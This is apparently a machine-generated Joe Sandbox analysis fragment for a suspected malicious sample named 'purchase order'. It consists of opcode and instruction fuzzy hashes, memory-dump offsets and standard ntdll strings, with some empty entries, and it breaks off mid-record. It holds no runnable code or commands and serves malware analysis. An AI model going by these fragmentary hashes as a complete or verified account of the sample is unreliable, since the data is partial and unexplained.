                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 17536433319d781127ecc705b0b8debcfca5d098dd39f98be043d93becac6a20
                                                                                                              • Instruction ID: fbbe1860b1f2d2645922c9dbfd2e9767d5ed3811b090ee99f84b5bd5abb5a211
                                                                                                              • Opcode Fuzzy Hash: 17536433319d781127ecc705b0b8debcfca5d098dd39f98be043d93becac6a20
                                                                                                              • Instruction Fuzzy Hash: 0C018936510219ABCF129E94DC44EDE3FA6FB4C754F059105FE196A220C732D970EB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9dee0429986324cd7ea530ed5649155278496aa3887d37c398e610bc236f355c
                                                                                                              • Instruction ID: 6758a5d103920688cba7fa3d9b327497c3928e086974d6dc5e24847533842af0
                                                                                                              • Opcode Fuzzy Hash: 9dee0429986324cd7ea530ed5649155278496aa3887d37c398e610bc236f355c
                                                                                                              • Instruction Fuzzy Hash: 8DF0F0B2A043425BF39496198C22B2233DEF7C4791F25842BEF098F2C1E970D8018394
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e4095d4921ee8ee666dfaca272fcfce0af2b55c41f051dc75aa819a0fd68e98b
                                                                                                              • Instruction ID: 19f5ef578384599a1b946e7dfe8047120ee0426197f36176cc166296def8b65b
                                                                                                              • Opcode Fuzzy Hash: e4095d4921ee8ee666dfaca272fcfce0af2b55c41f051dc75aa819a0fd68e98b
                                                                                                              • Instruction Fuzzy Hash: 4D0144716407869BEB329B6CCD4DF2937E4BB40B54F880594BA018FAD6DB78D4418716
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction ID: 5ec8b2a682faf3d0fee587a40f1fb78fa52ca13f2edace8fe09b16d9302578f1
                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                              • Instruction Fuzzy Hash: DBF0893534192347EB7FAA2F9C10B2BA756AFD0950B05692C9755CB7C0DF60D8018790
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction ID: aabe1b8c87a55e4d6929d00783826271232fb6eb1cbfa4e723fd2f0fea1252f1
                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                              • Instruction Fuzzy Hash: 10F0E933F285129BE3358A4DDC86F16B7E8FFD5A60F190064A6049F260C360EC01C7D0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3b037ff7fb1663f899b16e43d06e69f28d19d8532aa7980f0ace8079d281ad48
                                                                                                              • Instruction ID: 3170dc5df9313c348f8f6f922711cd1cf36ad5f8802f88f4e36bc63d1bfdea1a
                                                                                                              • Opcode Fuzzy Hash: 3b037ff7fb1663f899b16e43d06e69f28d19d8532aa7980f0ace8079d281ad48
                                                                                                              • Instruction Fuzzy Hash: B1F0AF706097059FC314EF68C946A1EBBE4FF98710F80465AB898DF390E634EA00C796
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction ID: 7d73152834fc782fc155a6cb1f67c3892d6da2cfa93b894b7bd400c2c81a3e23
                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                              • Instruction Fuzzy Hash: 24F0B472610205EFE714DB25CC01F56B6EDFF98740F148878A945DF2A0FAB0DD01C655
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: c695494d39459fe8d7ad7f422f2e6cfc48ded0ec93654020f263d615b33b2c11
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: 93D0223222203193DB685665A820F677949BFC0AA0F0A012E380A9B800C1048C43D2E0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction ID: a77fee2f67001134aca999ec2eff0d349deade2baaee655df11a4fd886a07e31
                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction Fuzzy Hash: B1D012371E054DBBDB119F66DC02F957BA9FBA4BA0F444020B5048B5A0C63AE950D584
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1d45c75abf7c5d249e4a5906c38fbec323cd3c01883288bd509db44722b9ec45
                                                                                                              • Instruction ID: 8fe7efd4de0d5a8494a64b81c051d0bcc699ef40de0494e188cdcdd3580eddad
                                                                                                              • Opcode Fuzzy Hash: 1d45c75abf7c5d249e4a5906c38fbec323cd3c01883288bd509db44722b9ec45
                                                                                                              • Instruction Fuzzy Hash: 88D0A930612102CBEF2ACF1CCE20E2E3AB4FF10640F80006CE7009A820E368EC01CB21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction ID: 243e613f2dee191c2721d43b0028af50751f1c5a28f2150f7a70818f4212c3c1
                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction Fuzzy Hash: 8CD09236616A80CFD61A8B4CC5A5B1933E4BB45A44F810890E401CBB62E628D940CA00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction ID: 43ad327367116b81cfc8507cbc8078baaa3374971710f09caef4cb3b1234e165
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: 0FC01232150644AFD7119A95DD01F0177A9FB98B50F000021F2044B570C531E810E644
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: 58e402243b8e31d78a14697d8c2be654193668be54c660521b943ae586e85e9b
                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: 5BD01236100249EFCB02EF45D890D9A772AFBD8710F108019FD190B6508A31ED62DA50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: 76278bb96e3584690a43cb7950a22ade9c3d813c67c65fdc838126bd03929d71
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: 62C04879701A428FCF16DB2AE2D5F8977E4FB84790F190890E809CFB22E724E801DA11
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8e83770a76b9a29b3d58e08cf60482350ec140616fe5ab326f129cd021a80f6f
                                                                                                              • Instruction ID: 067a5140c71b5801f16ad8e854b736182706ba4a8d62091670c32b5013e3347e
                                                                                                              • Opcode Fuzzy Hash: 8e83770a76b9a29b3d58e08cf60482350ec140616fe5ab326f129cd021a80f6f
                                                                                                              • Instruction Fuzzy Hash: 6890023160580012914071584CC45864049B7E0311B59D411E0425954CCA548A565761
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d82d3ad314ed987b4aeee03b332b4e73bf34a6c2c416ba45cc9ebbd3ed0ad16c
                                                                                                              • Instruction ID: b50668ff34a36c15e53b1818da06aee410365074d2589672dd827ee283e15c79
                                                                                                              • Opcode Fuzzy Hash: d82d3ad314ed987b4aeee03b332b4e73bf34a6c2c416ba45cc9ebbd3ed0ad16c
                                                                                                              • Instruction Fuzzy Hash: DB90026160150042414071584C444466049B7E1311399D515A0555960CC65889559769
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 627542758549f342a4b3afa2992c1fab6fe729f9c716ddace34019d8e0311c6f
                                                                                                              • Instruction ID: 32c1d2896fe3f9d6d6b3fc47a4745cc711b3a972ea02438454d2c44ecaed43ee
                                                                                                              • Opcode Fuzzy Hash: 627542758549f342a4b3afa2992c1fab6fe729f9c716ddace34019d8e0311c6f
                                                                                                              • Instruction Fuzzy Hash: 2790023120140802D1807158484468A0049A7D1311F99D415A0026A54DCA558B597BA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a620bfe52548fafc1b3f90bdf56dfae8cb9f76a898e7df91a2fa331ee792ccfc
                                                                                                              • Instruction ID: 741b83eb5f1f094e443cd6577523c8b1b55141a73b13d1293d0291c9733f2384
                                                                                                              • Opcode Fuzzy Hash: a620bfe52548fafc1b3f90bdf56dfae8cb9f76a898e7df91a2fa331ee792ccfc
                                                                                                              • Instruction Fuzzy Hash: D590023120544842D14071584844A860059A7D0315F59D411A0065A94DD6658E55BB61
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 456110176e0fc58213a0d496bb2d268a848717c69747116933670948ae8a3401
                                                                                                              • Instruction ID: 3dd43db4a6b7eeb97bf754632cad0f11ba6cc1a334e5aab7f6a1c46546bdf437
                                                                                                              • Opcode Fuzzy Hash: 456110176e0fc58213a0d496bb2d268a848717c69747116933670948ae8a3401
                                                                                                              • Instruction Fuzzy Hash: 1A90023120140802D10471584C446C60049A7D0311F59D411A6025A55ED6A589917631
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e7efbe800b32e8e6535b483a29cfee098ddf7416fc9c2f353795648374b8be2d
                                                                                                              • Instruction ID: d0fa162e61f5afa91ab8a148cb5d991a11514f8f1a431c169bb2d36788995531
                                                                                                              • Opcode Fuzzy Hash: e7efbe800b32e8e6535b483a29cfee098ddf7416fc9c2f353795648374b8be2d
                                                                                                              • Instruction Fuzzy Hash: 6B90023160540802D150715848547860049A7D0311F59D411A0025A54DC7958B557BA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 68caca19081cd7626e4f3cc066d4f0952d46bd8ca12dfca8bd7c36a809318510
                                                                                                              • Instruction ID: b962fa91117b274c754b255b4a4d5417215c070d46d1065e76b2e96e6a242cdd
                                                                                                              • Opcode Fuzzy Hash: 68caca19081cd7626e4f3cc066d4f0952d46bd8ca12dfca8bd7c36a809318510
                                                                                                              • Instruction Fuzzy Hash: EF900225211400030105B5580B44547008AA7D5361359D421F1016950CD66189615621
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5989f1304873ec616ac7e293ca26c6f6399f91c2e34049576d2548e47e5e9d23
                                                                                                              • Instruction ID: 97c19775b5d734048e92af5227bb4062f10d7f93f222e44e082773d558fb6297
                                                                                                              • Opcode Fuzzy Hash: 5989f1304873ec616ac7e293ca26c6f6399f91c2e34049576d2548e47e5e9d23
                                                                                                              • Instruction Fuzzy Hash: E2900225221400020145B5580A4454B0489B7D6361399D415F1417990CC66189655721
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              • Instruction Fuzzy Hash: 9C90026120180403D14075584C446470049A7D0312F59D411A2065955ECA698D516635
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 12399d8e731e6e94cf43576fe4f0d000b3e0cc98db83ad278ab88d040464282b
                                                                                                              • Instruction ID: c72c05356aab21fd91da1bd0b9ab3814ca427c107dad00fd67f44e39a467a899
                                                                                                              • Opcode Fuzzy Hash: 12399d8e731e6e94cf43576fe4f0d000b3e0cc98db83ad278ab88d040464282b
                                                                                                              • Instruction Fuzzy Hash: 8F90022160140502D10171584844656004EA7D0251F99D422A1025955ECA658A92A631
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5db9979486344700662fb5776df916b7e81d2e1dca0d3209b37008ea24ba4d20
                                                                                                              • Instruction ID: 93d63cc7d4d794dab7c1e30eee2fbafee6aba75d3740c89b00aef3b553913f99
                                                                                                              • Opcode Fuzzy Hash: 5db9979486344700662fb5776df916b7e81d2e1dca0d3209b37008ea24ba4d20
                                                                                                              • Instruction Fuzzy Hash: 8090027120140402D140715848447860049A7D0311F59D411A5065954EC6998ED56B65
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78a178654d274b5eea23fc9955546b6320b632939e73d43ca0d3d30b16562a00
                                                                                                              • Instruction ID: fe75649adf07ffb2e00a6ff2a9cf58fb55c6e74ef53634e894939d497606b662
                                                                                                              • Opcode Fuzzy Hash: 78a178654d274b5eea23fc9955546b6320b632939e73d43ca0d3d30b16562a00
                                                                                                              • Instruction Fuzzy Hash: 1E90022120184442D14072584C44B4F4149A7E1212F99D419A4157954CC95589555B21
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3a04fa23b26d28780cf731ac3a8d043182d9692b5edb934c3e1b25d2d6cb8eb
                                                                                                              • Instruction ID: 18a7df108884b100629fc1b2edf7d82a72cd36f374cd152d7ffebaafc55ad6f5
                                                                                                              • Opcode Fuzzy Hash: a3a04fa23b26d28780cf731ac3a8d043182d9692b5edb934c3e1b25d2d6cb8eb
                                                                                                              • Instruction Fuzzy Hash: 7D90022124140802D14071588854747004AE7D0611F59D411A0025954DC6568A656BB1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1712b1620290fb5a8d495fa5fd213ac2b6f3f3fac3e00ef4e7b520dd7d13f435
                                                                                                              • Instruction ID: fa8f071f30b359a6e4515de6e6587705a0c3ef5b6c0ad6f3c68d37e1815cf843
                                                                                                              • Opcode Fuzzy Hash: 1712b1620290fb5a8d495fa5fd213ac2b6f3f3fac3e00ef4e7b520dd7d13f435
                                                                                                              • Instruction Fuzzy Hash: 1E90022124545102D150715C48446564049B7E0211F59D421A0815994DC59589556721
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8a0215303b51d2beaffeef4ba6cf5cea289c59d930e2b00b4c46b3224fd3e450
                                                                                                              • Instruction ID: de19d4b5a95d7d9ac34ac9f1eeee787929a050734f54f2d590ec86cfb8fcb008
                                                                                                              • Opcode Fuzzy Hash: 8a0215303b51d2beaffeef4ba6cf5cea289c59d930e2b00b4c46b3224fd3e450
                                                                                                              • Instruction Fuzzy Hash: E190023520140402D51071585C44686008AA7D0311F59E811A0425958DC69489A1A621
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aef92f32e46a7ef444b272305107396a1c379e567e66ea0ece7ab8cc2c7c92f5
                                                                                                              • Instruction ID: 6324b6ac1ec0daf86d994952db7fe92037a6ee29ed80744c3e1d9b379d09e6b6
                                                                                                              • Opcode Fuzzy Hash: aef92f32e46a7ef444b272305107396a1c379e567e66ea0ece7ab8cc2c7c92f5
                                                                                                              • Instruction Fuzzy Hash: C390023120240142954072585C44A8E4149A7E1312B99E815A0016954CC95489615721
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction ID: c95e441e6e187c0effe3ebaf6fe3fe5d65784a0af85680fa48b23376aed0396d
                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015D4725
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015D4742
                                                                                                              • ExecuteOptions, xrefs: 015D46A0
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 015D4787
                                                                                                              • Execute=1, xrefs: 015D4713
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015D46FC
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015D4655
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 015D031E
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015D02BD
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015D02E7
                                                                                                              Similarity
                                                                                                              • API ID:
